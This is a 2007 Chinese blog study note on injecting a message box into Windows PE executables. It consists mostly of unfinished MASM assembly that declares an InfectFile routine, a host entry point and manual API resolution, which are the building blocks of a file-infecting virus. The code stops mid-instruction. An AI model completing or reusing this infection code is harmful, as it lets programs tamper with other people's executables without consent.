pe文件学习笔记3-----在pe文件上添加一个消息框1 - 无理取闹的博客

作者在 2007-08-23 05:47:00 发布以下内容

.386
.model flat,stdcall
option casemap:none
include windows.inc
include kernel32.inc
includelib kernel32.lib

;##########
InfectFile proto :dword
GetApiA proto :DWORD,:DWORD
;#########
.code

;###############插入代码############################
VStart:
appBase         dd ?
k32Base         dd ?
HostEntry    dd    ?
;#############################################
sGetModuleHandle       db "GetModuleHandleA",0
sGetProcAddress        db "GetProcAddress",0
sExitProcess           db "ExitProcess",0
sLoadLibrary           db "LoadLibraryA",0
sMessageBoxA           db "MessageBoxA",0

aGetModuleHandle                dd 0
aGetProcAddress                 dd 0
aExitProcess                    dd 0
aLoadLibrary                    dd 0
aMessageBoxA                    dd 0

u32 db "User32.dll",0
k32 db "Kernel32.dll",0

sztit                   db "by 无理取闹",0
szMsg                 db "我进来了，呵呵！",0
szBuffer    db    256 dup    (?)

lpApiAddrs      label   near
              dd      offset sGetModuleHandle
              dd      offset sGetProcAddress
              dd      offset sExitProcess
              dd      offset sLoadLibrary
              dd      0
;################获取api#########################################################
GetApiA         proc    Base:DWORD,sApi:DWORD
    local    @dwStringLength
    local    @return
    pushad
    ;#############计算api的长度#########################
    mov    edi,sApi
    mov    ecx,-1
    xor    al,al
    cld
    repnz    scasb
    mov    ecx,edi
    sub

默认分类 | 阅读 2844 次

文章评论，共0条